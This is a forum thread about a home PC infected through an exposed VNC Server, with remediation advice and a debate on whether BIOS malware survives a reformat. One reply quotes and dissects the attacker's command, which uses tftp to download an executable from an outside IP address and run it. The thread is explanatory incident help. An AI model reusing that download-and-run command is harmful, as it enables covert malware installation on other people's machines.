Trojan from using VNC Viewer Software

Matt wrote on 30 Mar 2007 08:55:11 -0700:

This should have nothing to do with the Viewer, are you sure you didn't also install the Server on your own machine and leave the port open to the outside world? See

for more info, basically someone/something is connecting to the VNC Server on your machine bypassing the authentication, and then running the commands (either manually or using a script, most likely using a script). I'm guessing that when you downloaded and installed VNC Viewer you actually download the full Client+Server package and installed both, and you allowed VNC Server to listen in Zone Alarm, probably when it first ran and you blindly hit the Allow button. Get your machine cleaned and uninstall VNC Server - you do not need the server component to use the Viewer to access another machine.

Dan

First, how do you know it's a trojan STILL on your system?

Did you reset the VNC connection password?

Did you change the default VNC Server port to something other than 5900?

Why is your computer exposed directly to the internet instead of behind a NAT appliance of some type?

That's an assumption I am making, I doubt the Trojan would kindly remove all traces of itself once it has done what it wanted to do. I've run scans in all the programmes I mentioned above and one of them could find any mention of this Trojan, so it was has clearly tidied up after itself very well.

I'm using VNC Viewer 4.1.2 (the free one) which has no such option

Again, I had no such option

I use a router (which HAD the ports open for VNC I thought I needed, but I have just closed them realising of course that they aren't actually needed), along with Zonealarm, so I don't see myself as being directly connected to the Internet.

Kind regards,

Matt

See

for more info, basically someone/something is connecting to the VNC Server

You are absolutely right, I did install the full package and probably did tell ZoneAlarm to let it have special prividedges. I will uninstall it right away. The only problem is that I don't think I am going to be able to "clean" ym computer, because after running all the scans I mentioend above, none of them came up with anything.

Is their anything I can do aside from reformatting my computer to ensure I get rid of this?

Kind Regards,

Matt

That's an assumption I am making, I doubt the Trojan would kindly remove all traces of itself once it has done what it wanted to do. I've run scans in all the programmes I mentioned above and one of them could find any mention of this Trojan, so it was has clearly tidied up after itself very well.

I'm using VNC Viewer 4.1.2 (the free one0 which has no such option

Again, I had no such option

I use a router (which HAD the ports open for VNC I thought I needed, but I have just closed them realising of course that they aren't actually needed), along with Zonealarm, so I don't see myself as being directly connected to the Internet.

Kind regards,

Matt

Use Autoruns to look for startup programs that you didn't authorize. Look for any instances of DLL files being loaded on startup that are not authorized. You can try looking in the System32 directory for recently modified files, or hidden files that have random names like xzlk.dll, and send the files found to

for analysis. You could also try running a spyware scanner like Spybot Search & Destroy or SuperAntiSpyware; the later can detect files based on characteristics like size, random file names, and other attributes that are common among trojans and malware.

That makes for some interesting reading, looks like a reformat is the only option.

Thanks to everyone for all the replies.

Kind Regards,

Matt

There are exploits that modify the POST code and BIOS so that even reformatting may not help :-( Is it time for a new computer???

??? i've never heard of anything specifically modifying the power on self test (post) facility of a computer (isn't it *part of* the bios?)...

as for the bios, the only modifications any known malware has ever made is to corrupt flashable bios, and that is rather noticable as it stops the computer from booting...

so no, it's not time for a new computer yet...

Yes and no.

Everything that restores your computer to a well-known safe state is an option. If you have a verified backup, you can restore from that. You can compare against a complete reference system. If you have a backup containing a list of checksums of all system-relevant files, you can detect the changes and selective restore these parts (or verify them as harmless changes). You can boot a trusted system and verify all signed binaries and just restore all relevant data files (Windows Registry and some other databases, some INF and INI files, boot sector etc.).

But, if no such safe reference exists, the only well-known safe state is a fresh install. Sadly, this is the most common case.

Actually it's quite trivial to modify the BIOS (intentionally!), see what the BIOS modder communities are achieving. It would be no problem to implement such malware.

There have been extensive discussions about the default settings for enabling flashing the BIOS as well as how well these actually work. If you have a hardware-implemented switch, if it's set to disabled, and you flash chip is not one of those old Intel or Amtel chips from before about 2001, it shouldn't be possible to flash the BIOS.

Well I formatted and reinstalled Windows a few days ago now and everything seems to be running smoothly.

Thanks again for all the replies on this topic.

Kind regards,

Matt

Well assuming your original post contains the only commands that were run here's what we can figure out.

"%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp - i

64.79.213.12 GET ktqjy.exe & start ktqjy& "

%comspec% is an environment variable on windows system which points to the command prompt executable. We can verify this by launching a command prompt and echo'ing the value to the screen, ie: C:\\Documents and Settings\\someuser>echo %comspec% C:\\WINNT\\system32\\cmd.exe

Next we can see what the /c switch does for the command prompt (cmd.exe), ie: C:\\Documents and Settings\\someuser>cmd.exe /? Starts a new instance of the Windows XP command interpreter

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | / V:OFF] [[/S] [/C | /K] string]

/C Carries out the command specified by string and then terminates

Ok so /c carries out the commands provided when cmd.exe is called (via %comspec%).

Next we see that he echo'd some useless junk to the screen....Repairing....Please Wait, laaa deee daaaa.

Next he uses tftp to connect to 64.79.213.12 and get ktqjy.exe. We can verify this by checking the command optionsn for tftp:

C:\\Documents and Settings\\someuser>tftp /?

Transfers files to and from a remote computer running the TFTP service.

TFTP [-i] host [GET | PUT] source [destination]

-i Specifies binary image transfer mode (also called octet). In binary image mode the file is moved literally, byte by byte. Use this mode when transferring binary files.

So -i specifies binary transfer which is what he'd need for a executable (exe).

Lastly he launches ktqjy.

ktqjy.exe should be sitting in whatever the default directory of your command prompt is, something like "C:\\Documents and Settings\\someuser" if you goto the start menu select run type cmd and hit ok it'll be displayed on the screen. You can navigate to this directory in explorer and delete the file. You may have to launch task manager and "End Process" on it first. Also you should fire up msconfig (start:run msconfig) and review all your startup items.

etc....

Just follow the information you have.

In the meanwhile, ktqjy.exe has modified various system binaries, imposed some kernel hooks such that killing just removes it from the list of processed (but still keeps on running) and doesn't list the three other copies of itself not any more, has downloaded 5 other binaries and executed some, modified some system settings to open some obstrusive security vulnerabilities to allow easier reinfection, ...

Oh, and it might have simply modified the previous history.

Short to say: You have no reliable information whatsoever.